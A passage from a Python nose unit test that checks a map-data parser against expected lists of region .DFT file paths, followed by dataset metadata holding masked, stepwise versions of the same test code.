"NAME/N0000036.DFT",
"NAME/N0000042.DFT",
"NAME/N0000043.DFT",
"NAME/N0000044.DFT",
"NAME/N0000045.DFT",
"POI/P0000024.DFT",
"POI/P0000025.DFT",
"POI/P0000026.DFT",
"POI/P0000027.DFT",
"POI/P0000033.DFT",
"POI/P0000034.DFT",
"POI/P0000035.DFT",
"POI/P0000036.DFT",
"POI/P0000042.DFT",
"POI/P0000043.DFT",
"POI/P0000044.DFT",
"POI/P0000045.DFT",
],
3: [
"BACK/B0000001.DFT",
"BACK/B0000008.DFT",
"BACK/B0000009.DFT",
"BACK/B0000010.DFT",
"BACK/B0000017.DFT",
"BACK/B0000018.DFT",
"BACK/B0000019.DFT",
"BACK/B0000026.DFT",
"BACK/B0000027.DFT",
"NAME/N0000001.DFT",
"NAME/N0000008.DFT",
"NAME/N0000009.DFT",
"NAME/N0000010.DFT",
"NAME/N0000017.DFT",
"NAME/N0000018.DFT",
"NAME/N0000019.DFT",
"NAME/N0000026.DFT",
"NAME/N0000027.DFT",
"POI/P0000017.DFT",
"POI/P0000018.DFT",
"POI/P0000019.DFT",
"POI/P0000026.DFT",
"POI/P0000027.DFT",
],
4: [
"BACK/B0000019.DFT",
"BACK/B0000020.DFT",
"BACK/B0000021.DFT",
"BACK/B0000022.DFT",
"BACK/B0000027.DFT",
"BACK/B0000028.DFT",
"BACK/B0000029.DFT",
"BACK/B0000030.DFT",
"BACK/B0000031.DFT",
"BACK/B0000036.DFT",
"BACK/B0000037.DFT",
"BACK/B0000038.DFT",
"BACK/B0000039.DFT",
"BACK/B0000040.DFT",
"BACK/B0000045.DFT",
"BACK/B0000046.DFT",
"BACK/B0000047.DFT",
"BACK/B0000048.DFT",
"BACK/B0000049.DFT",
"BACK/B0000054.DFT",
"NAME/N0000019.DFT",
"NAME/N0000020.DFT",
"NAME/N0000021.DFT",
"NAME/N0000022.DFT",
"NAME/N0000027.DFT",
"NAME/N0000028.DFT",
"NAME/N0000029.DFT",
"NAME/N0000030.DFT",
"NAME/N0000031.DFT",
"NAME/N0000036.DFT",
"NAME/N0000037.DFT",
"NAME/N0000038.DFT",
"NAME/N0000039.DFT",
"NAME/N0000040.DFT",
"NAME/N0000045.DFT",
"NAME/N0000046.DFT",
"NAME/N0000047.DFT",
"NAME/N0000048.DFT",
"NAME/N0000049.DFT",
"NAME/N0000054.DFT",
"POI/P0000019.DFT",
"POI/P0000020.DFT",
"POI/P0000021.DFT",
"POI/P0000022.DFT",
"POI/P0000027.DFT",
"POI/P0000028.DFT",
"POI/P0000029.DFT",
"POI/P0000030.DFT",
"POI/P0000031.DFT",
"POI/P0000036.DFT",
"POI/P0000037.DFT",
"POI/P0000038.DFT",
"POI/P0000039.DFT",
"POI/P0000040.DFT",
"POI/P0000045.DFT",
"POI/P0000046.DFT",
"POI/P0000047.DFT",
"POI/P0000048.DFT",
"POI/P0000049.DFT",
"POI/P0000054.DFT",
],
5: [
"BACK/B0000002.DFT",
"BACK/B0000003.DFT",
"BACK/B0000004.DFT",
"BACK/B0000011.DFT",
"BACK/B0000012.DFT",
"BACK/B0000013.DFT",
"BACK/B0000020.DFT",
"BACK/B0000021.DFT",
"BACK/B0000022.DFT",
"BACK/B0000029.DFT",
"BACK/B0000030.DFT",
"BACK/B0000031.DFT",
"NAME/N0000002.DFT",
"NAME/N0000003.DFT",
"NAME/N0000004.DFT",
"NAME/N0000011.DFT",
"NAME/N0000012.DFT",
"NAME/N0000013.DFT",
"NAME/N0000020.DFT",
"NAME/N0000021.DFT",
"NAME/N0000022.DFT",
"NAME/N0000029.DFT",
"NAME/N0000030.DFT",
"NAME/N0000031.DFT",
"POI/P0000003.DFT",
"POI/P0000011.DFT",
"POI/P0000012.DFT",
"POI/P0000013.DFT",
"POI/P0000020.DFT",
"POI/P0000021.DFT",
"POI/P0000022.DFT",
"POI/P0000029.DFT",
"POI/P0000030.DFT",
"POI/P0000031.DFT",
],
6: [
"BACK/B0000040.DFT",
"BACK/B0000041.DFT",
"BACK/B0000042.DFT",
"BACK/B0000049.DFT",
"BACK/B0000050.DFT",
"BACK/B0000051.DFT",
"NAME/N0000040.DFT",
"NAME/N0000041.DFT",
"NAME/N0000042.DFT",
"NAME/N0000049.DFT",
"NAME/N0000050.DFT",
"NAME/N0000051.DFT",
"POI/P0000040.DFT",
"POI/P0000041.DFT",
"POI/P0000042.DFT",
"POI/P0000049.DFT",
"POI/P0000050.DFT",
"POI/P0000051.DFT",
],
7: [
"BACK/B0000032.DFT",
"BACK/B0000033.DFT",
"BACK/B0000034.DFT",
"BACK/B0000041.DFT",
"BACK/B0000042.DFT",
"BACK/B0000043.DFT",
"BACK/B0000050.DFT",
"BACK/B0000051.DFT",
"BACK/B0000052.DFT",
"NAME/N0000032.DFT",
"NAME/N0000033.DFT",
"NAME/N0000034.DFT",
"NAME/N0000041.DFT",
"NAME/N0000042.DFT",
"NAME/N0000043.DFT",
"NAME/N0000050.DFT",
"NAME/N0000051.DFT",
"NAME/N0000052.DFT",
"POI/P0000032.DFT",
"POI/P0000033.DFT",
"POI/P0000034.DFT",
"POI/P0000041.DFT",
"POI/P0000042.DFT",
"POI/P0000043.DFT",
"POI/P0000050.DFT",
"POI/P0000051.DFT",
"POI/P0000052.DFT",
],
8: [
"BACK/B0000031.DFT",
"BACK/B0000032.DFT",
"BACK/B0000033.DFT",
"BACK/B0000040.DFT",
"BACK/B0000041.DFT",
"BACK/B0000042.DFT",
"BACK/B0000049.DFT",
"BACK/B0000050.DFT",
"BACK/B0000051.DFT",
"NAME/N0000031.DFT",
"NAME/N0000032.DFT",
"NAME/N0000033.DFT",
"NAME/N0000040.DFT",
"NAME/N0000041.DFT",
"NAME/N0000042.DFT",
"NAME/N0000049.DFT",
"NAME/N0000050.DFT",
"NAME/N0000051.DFT",
"POI/P0000031.DFT",
"POI/P0000032.DFT",
"POI/P0000033.DFT",
"POI/P0000040.DFT",
"POI/P0000041.DFT",
"POI/P0000042.DFT",
"POI/P0000049.DFT",
"POI/P0000050.DFT",
"POI/P0000051.DFT",
],
9: [
"BACK/B0000005.DFT",
"BACK/B0000006.DFT",
"BACK/B0000007.DFT",
"BACK/B0000014.DFT",
"BACK/B0000015.DFT",
"BACK/B0000016.DFT",
"BACK/B0000023.DFT",
"BACK/B0000024.DFT",
"BACK/B0000025.DFT",
"BACK/B0000032.DFT",
"BACK/B0000033.DFT",
"BACK/B0000034.DFT",
"BACK/B0000041.DFT",
"BACK/B0000042.DFT",
"BACK/B0000043.DFT",
"NAME/N0000005.DFT",
"NAME/N0000006.DFT",
"NAME/N0000007.DFT",
"NAME/N0000014.DFT",
"NAME/N0000015.DFT",
"NAME/N0000016.DFT",
"NAME/N0000023.DFT",
"NAME/N0000024.DFT",
"NAME/N0000025.DFT",
"NAME/N0000032.DFT",
"NAME/N0000033.DFT",
"NAME/N0000034.DFT",
"NAME/N0000041.DFT",
"NAME/N0000042.DFT",
"NAME/N0000043.DFT",
"POI/P0000014.DFT",
"POI/P0000015.DFT",
"POI/P0000023.DFT",
"POI/P0000024.DFT",
"POI/P0000025.DFT",
"POI/P0000032.DFT",
"POI/P0000033.DFT",
"POI/P0000034.DFT",
"POI/P0000041.DFT",
"POI/P0000042.DFT",
"POI/P0000043.DFT",
],
10: [
"BACK/B0000037.DFT",
"BACK/B0000041.DFT",
"BACK/B0000042.DFT",
"BACK/B0000043.DFT",
"BACK/B0000044.DFT",
"BACK/B0000045.DFT",
"BACK/B0000046.DFT",
"BACK/B0000050.DFT",
"BACK/B0000051.DFT",
"BACK/B0000052.DFT",
"BACK/B0000053.DFT",
"BACK/B0000054.DFT",
"NAME/N0000037.DFT",
"NAME/N0000041.DFT",
"NAME/N0000042.DFT",
"NAME/N0000043.DFT",
"NAME/N0000044.DFT",
"NAME/N0000045.DFT",
"NAME/N0000046.DFT",
"NAME/N0000050.DFT",
"NAME/N0000051.DFT",
"NAME/N0000052.DFT",
"NAME/N0000053.DFT",
"NAME/N0000054.DFT",
"POI/P0000037.DFT",
"POI/P0000041.DFT",
"POI/P0000042.DFT",
"POI/P0000043.DFT",
"POI/P0000044.DFT",
"POI/P0000045.DFT",
"POI/P0000046.DFT",
"POI/P0000050.DFT",
"POI/P0000051.DFT",
"POI/P0000052.DFT",
"POI/P0000053.DFT",
"POI/P0000054.DFT",
],
},
}
nose.tools.assert_equal(result, expected)
|
flexible
|
{
"blob_id": "4dfdbc692858a627248cbe47d19b43c2a27ec70e",
"index": 7373,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_mapdata_test():\n current_folder = os.path.dirname(os.path.realpath(__file__))\n misc_folder = os.path.join(current_folder, 'misc')\n maplistdata_path = os.path.join(misc_folder, 'MapList.dat')\n result = copy.parse_mapdata(maplistdata_path)\n expected = {'num1': '00010001', 'num2': '00010001', 'regions': {(1): [\n 'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000044.DFT',\n 'BACK/B0000045.DFT', 'BACK/B0000053.DFT', 'BACK/B0000054.DFT',\n 'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000044.DFT',\n 'NAME/N0000045.DFT', 'NAME/N0000053.DFT', 'NAME/N0000054.DFT',\n 'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000044.DFT',\n 'POI/P0000045.DFT', 'POI/P0000053.DFT', 'POI/P0000054.DFT'], (2): [\n 'BACK/B0000024.DFT', 'BACK/B0000025.DFT', 'BACK/B0000026.DFT',\n 'BACK/B0000027.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000043.DFT', 'BACK/B0000044.DFT', 'BACK/B0000045.DFT',\n 'NAME/N0000024.DFT', 'NAME/N0000025.DFT', 'NAME/N0000026.DFT',\n 'NAME/N0000027.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000043.DFT', 'NAME/N0000044.DFT', 'NAME/N0000045.DFT',\n 'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000026.DFT',\n 'POI/P0000027.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',\n 'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000042.DFT',\n 'POI/P0000043.DFT', 'POI/P0000044.DFT', 'POI/P0000045.DFT'], (3): [\n 'BACK/B0000001.DFT', 'BACK/B0000008.DFT', 'BACK/B0000009.DFT',\n 'BACK/B0000010.DFT', 'BACK/B0000017.DFT', 'BACK/B0000018.DFT',\n 'BACK/B0000019.DFT', 'BACK/B0000026.DFT', 'BACK/B0000027.DFT',\n 'NAME/N0000001.DFT', 'NAME/N0000008.DFT', 'NAME/N0000009.DFT',\n 'NAME/N0000010.DFT', 'NAME/N0000017.DFT', 'NAME/N0000018.DFT',\n 'NAME/N0000019.DFT', 'NAME/N0000026.DFT', 'NAME/N0000027.DFT',\n 'POI/P0000017.DFT', 'POI/P0000018.DFT', 'POI/P0000019.DFT',\n 'POI/P0000026.DFT', 'POI/P0000027.DFT'], (4): ['BACK/B0000019.DFT',\n 'BACK/B0000020.DFT', 'BACK/B0000021.DFT', 'BACK/B0000022.DFT',\n 'BACK/B0000027.DFT', 'BACK/B0000028.DFT', 'BACK/B0000029.DFT',\n 'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'BACK/B0000036.DFT',\n 'BACK/B0000037.DFT', 'BACK/B0000038.DFT', 'BACK/B0000039.DFT',\n 'BACK/B0000040.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',\n 'BACK/B0000047.DFT', 'BACK/B0000048.DFT', 'BACK/B0000049.DFT',\n 'BACK/B0000054.DFT', 'NAME/N0000019.DFT', 'NAME/N0000020.DFT',\n 'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000027.DFT',\n 'NAME/N0000028.DFT', 'NAME/N0000029.DFT', 'NAME/N0000030.DFT',\n 'NAME/N0000031.DFT', 'NAME/N0000036.DFT', 'NAME/N0000037.DFT',\n 'NAME/N0000038.DFT', 'NAME/N0000039.DFT', 'NAME/N0000040.DFT',\n 'NAME/N0000045.DFT', 'NAME/N0000046.DFT', 'NAME/N0000047.DFT',\n 'NAME/N0000048.DFT', 'NAME/N0000049.DFT', 'NAME/N0000054.DFT',\n 'POI/P0000019.DFT', 'POI/P0000020.DFT', 'POI/P0000021.DFT',\n 'POI/P0000022.DFT', 'POI/P0000027.DFT', 'POI/P0000028.DFT',\n 'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT',\n 'POI/P0000036.DFT', 'POI/P0000037.DFT', 'POI/P0000038.DFT',\n 'POI/P0000039.DFT', 'POI/P0000040.DFT', 'POI/P0000045.DFT',\n 'POI/P0000046.DFT', 'POI/P0000047.DFT', 'POI/P0000048.DFT',\n 'POI/P0000049.DFT', 'POI/P0000054.DFT'], (5): ['BACK/B0000002.DFT',\n 'BACK/B0000003.DFT', 'BACK/B0000004.DFT', 'BACK/B0000011.DFT',\n 'BACK/B0000012.DFT', 'BACK/B0000013.DFT', 'BACK/B0000020.DFT',\n 'BACK/B0000021.DFT', 'BACK/B0000022.DFT', 'BACK/B0000029.DFT',\n 'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'NAME/N0000002.DFT',\n 'NAME/N0000003.DFT', 'NAME/N0000004.DFT', 'NAME/N0000011.DFT',\n 'NAME/N0000012.DFT', 'NAME/N0000013.DFT', 'NAME/N0000020.DFT',\n 'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000029.DFT',\n 'NAME/N0000030.DFT', 'NAME/N0000031.DFT', 'POI/P0000003.DFT',\n 'POI/P0000011.DFT', 'POI/P0000012.DFT', 'POI/P0000013.DFT',\n 'POI/P0000020.DFT', 'POI/P0000021.DFT', 'POI/P0000022.DFT',\n 'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT'], (6): [\n 'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',\n 'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',\n 'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',\n 'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (7): [\n 'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',\n 'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',\n 'POI/P0000032.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',\n 'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',\n 'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT'], (8): [\n 'BACK/B0000031.DFT', 'BACK/B0000032.DFT', 'BACK/B0000033.DFT',\n 'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',\n 'NAME/N0000031.DFT', 'NAME/N0000032.DFT', 'NAME/N0000033.DFT',\n 'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',\n 'POI/P0000031.DFT', 'POI/P0000032.DFT', 'POI/P0000033.DFT',\n 'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',\n 'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (9): [\n 'BACK/B0000005.DFT', 'BACK/B0000006.DFT', 'BACK/B0000007.DFT',\n 'BACK/B0000014.DFT', 'BACK/B0000015.DFT', 'BACK/B0000016.DFT',\n 'BACK/B0000023.DFT', 'BACK/B0000024.DFT', 'BACK/B0000025.DFT',\n 'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'NAME/N0000005.DFT', 'NAME/N0000006.DFT', 'NAME/N0000007.DFT',\n 'NAME/N0000014.DFT', 'NAME/N0000015.DFT', 'NAME/N0000016.DFT',\n 'NAME/N0000023.DFT', 'NAME/N0000024.DFT', 'NAME/N0000025.DFT',\n 'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'POI/P0000014.DFT', 'POI/P0000015.DFT', 'POI/P0000023.DFT',\n 'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000032.DFT',\n 'POI/P0000033.DFT', 'POI/P0000034.DFT', 'POI/P0000041.DFT',\n 'POI/P0000042.DFT', 'POI/P0000043.DFT'], (10): ['BACK/B0000037.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'BACK/B0000044.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',\n 'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',\n 'BACK/B0000053.DFT', 'BACK/B0000054.DFT', 'NAME/N0000037.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'NAME/N0000044.DFT', 'NAME/N0000045.DFT', 'NAME/N0000046.DFT',\n 'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',\n 'NAME/N0000053.DFT', 'NAME/N0000054.DFT', 'POI/P0000037.DFT',\n 'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',\n 'POI/P0000044.DFT', 'POI/P0000045.DFT', 'POI/P0000046.DFT',\n 'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT',\n 'POI/P0000053.DFT', 'POI/P0000054.DFT']}}\n nose.tools.assert_equal(result, expected)\n",
"step-3": "<mask token>\n\n\ndef get_parser_test():\n \"\"\"Check if the evaluation model returns a parser object.\"\"\"\n copy.get_parser()\n\n\ndef parse_mapdata_test():\n current_folder = os.path.dirname(os.path.realpath(__file__))\n misc_folder = os.path.join(current_folder, 'misc')\n maplistdata_path = os.path.join(misc_folder, 'MapList.dat')\n result = copy.parse_mapdata(maplistdata_path)\n expected = {'num1': '00010001', 'num2': '00010001', 'regions': {(1): [\n 'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000044.DFT',\n 'BACK/B0000045.DFT', 'BACK/B0000053.DFT', 'BACK/B0000054.DFT',\n 'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000044.DFT',\n 'NAME/N0000045.DFT', 'NAME/N0000053.DFT', 'NAME/N0000054.DFT',\n 'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000044.DFT',\n 'POI/P0000045.DFT', 'POI/P0000053.DFT', 'POI/P0000054.DFT'], (2): [\n 'BACK/B0000024.DFT', 'BACK/B0000025.DFT', 'BACK/B0000026.DFT',\n 'BACK/B0000027.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000043.DFT', 'BACK/B0000044.DFT', 'BACK/B0000045.DFT',\n 'NAME/N0000024.DFT', 'NAME/N0000025.DFT', 'NAME/N0000026.DFT',\n 'NAME/N0000027.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000043.DFT', 'NAME/N0000044.DFT', 'NAME/N0000045.DFT',\n 'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000026.DFT',\n 'POI/P0000027.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',\n 'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000042.DFT',\n 'POI/P0000043.DFT', 'POI/P0000044.DFT', 'POI/P0000045.DFT'], (3): [\n 'BACK/B0000001.DFT', 'BACK/B0000008.DFT', 'BACK/B0000009.DFT',\n 'BACK/B0000010.DFT', 'BACK/B0000017.DFT', 'BACK/B0000018.DFT',\n 'BACK/B0000019.DFT', 'BACK/B0000026.DFT', 'BACK/B0000027.DFT',\n 'NAME/N0000001.DFT', 'NAME/N0000008.DFT', 'NAME/N0000009.DFT',\n 'NAME/N0000010.DFT', 'NAME/N0000017.DFT', 'NAME/N0000018.DFT',\n 'NAME/N0000019.DFT', 'NAME/N0000026.DFT', 'NAME/N0000027.DFT',\n 'POI/P0000017.DFT', 'POI/P0000018.DFT', 'POI/P0000019.DFT',\n 'POI/P0000026.DFT', 'POI/P0000027.DFT'], (4): ['BACK/B0000019.DFT',\n 'BACK/B0000020.DFT', 'BACK/B0000021.DFT', 'BACK/B0000022.DFT',\n 'BACK/B0000027.DFT', 'BACK/B0000028.DFT', 'BACK/B0000029.DFT',\n 'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'BACK/B0000036.DFT',\n 'BACK/B0000037.DFT', 'BACK/B0000038.DFT', 'BACK/B0000039.DFT',\n 'BACK/B0000040.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',\n 'BACK/B0000047.DFT', 'BACK/B0000048.DFT', 'BACK/B0000049.DFT',\n 'BACK/B0000054.DFT', 'NAME/N0000019.DFT', 'NAME/N0000020.DFT',\n 'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000027.DFT',\n 'NAME/N0000028.DFT', 'NAME/N0000029.DFT', 'NAME/N0000030.DFT',\n 'NAME/N0000031.DFT', 'NAME/N0000036.DFT', 'NAME/N0000037.DFT',\n 'NAME/N0000038.DFT', 'NAME/N0000039.DFT', 'NAME/N0000040.DFT',\n 'NAME/N0000045.DFT', 'NAME/N0000046.DFT', 'NAME/N0000047.DFT',\n 'NAME/N0000048.DFT', 'NAME/N0000049.DFT', 'NAME/N0000054.DFT',\n 'POI/P0000019.DFT', 'POI/P0000020.DFT', 'POI/P0000021.DFT',\n 'POI/P0000022.DFT', 'POI/P0000027.DFT', 'POI/P0000028.DFT',\n 'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT',\n 'POI/P0000036.DFT', 'POI/P0000037.DFT', 'POI/P0000038.DFT',\n 'POI/P0000039.DFT', 'POI/P0000040.DFT', 'POI/P0000045.DFT',\n 'POI/P0000046.DFT', 'POI/P0000047.DFT', 'POI/P0000048.DFT',\n 'POI/P0000049.DFT', 'POI/P0000054.DFT'], (5): ['BACK/B0000002.DFT',\n 'BACK/B0000003.DFT', 'BACK/B0000004.DFT', 'BACK/B0000011.DFT',\n 'BACK/B0000012.DFT', 'BACK/B0000013.DFT', 'BACK/B0000020.DFT',\n 'BACK/B0000021.DFT', 'BACK/B0000022.DFT', 'BACK/B0000029.DFT',\n 'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'NAME/N0000002.DFT',\n 'NAME/N0000003.DFT', 'NAME/N0000004.DFT', 'NAME/N0000011.DFT',\n 'NAME/N0000012.DFT', 'NAME/N0000013.DFT', 'NAME/N0000020.DFT',\n 'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000029.DFT',\n 'NAME/N0000030.DFT', 'NAME/N0000031.DFT', 'POI/P0000003.DFT',\n 'POI/P0000011.DFT', 'POI/P0000012.DFT', 'POI/P0000013.DFT',\n 'POI/P0000020.DFT', 'POI/P0000021.DFT', 'POI/P0000022.DFT',\n 'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT'], (6): [\n 'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',\n 'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',\n 'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',\n 'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (7): [\n 'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',\n 'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',\n 'POI/P0000032.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',\n 'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',\n 'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT'], (8): [\n 'BACK/B0000031.DFT', 'BACK/B0000032.DFT', 'BACK/B0000033.DFT',\n 'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',\n 'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',\n 'NAME/N0000031.DFT', 'NAME/N0000032.DFT', 'NAME/N0000033.DFT',\n 'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',\n 'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',\n 'POI/P0000031.DFT', 'POI/P0000032.DFT', 'POI/P0000033.DFT',\n 'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',\n 'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (9): [\n 'BACK/B0000005.DFT', 'BACK/B0000006.DFT', 'BACK/B0000007.DFT',\n 'BACK/B0000014.DFT', 'BACK/B0000015.DFT', 'BACK/B0000016.DFT',\n 'BACK/B0000023.DFT', 'BACK/B0000024.DFT', 'BACK/B0000025.DFT',\n 'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'NAME/N0000005.DFT', 'NAME/N0000006.DFT', 'NAME/N0000007.DFT',\n 'NAME/N0000014.DFT', 'NAME/N0000015.DFT', 'NAME/N0000016.DFT',\n 'NAME/N0000023.DFT', 'NAME/N0000024.DFT', 'NAME/N0000025.DFT',\n 'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'POI/P0000014.DFT', 'POI/P0000015.DFT', 'POI/P0000023.DFT',\n 'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000032.DFT',\n 'POI/P0000033.DFT', 'POI/P0000034.DFT', 'POI/P0000041.DFT',\n 'POI/P0000042.DFT', 'POI/P0000043.DFT'], (10): ['BACK/B0000037.DFT',\n 'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',\n 'BACK/B0000044.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',\n 'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',\n 'BACK/B0000053.DFT', 'BACK/B0000054.DFT', 'NAME/N0000037.DFT',\n 'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',\n 'NAME/N0000044.DFT', 'NAME/N0000045.DFT', 'NAME/N0000046.DFT',\n 'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',\n 'NAME/N0000053.DFT', 'NAME/N0000054.DFT', 'POI/P0000037.DFT',\n 'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',\n 'POI/P0000044.DFT', 'POI/P0000045.DFT', 'POI/P0000046.DFT',\n 'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT',\n 'POI/P0000053.DFT', 'POI/P0000054.DFT']}}\n nose.tools.assert_equal(result, expected)\n",
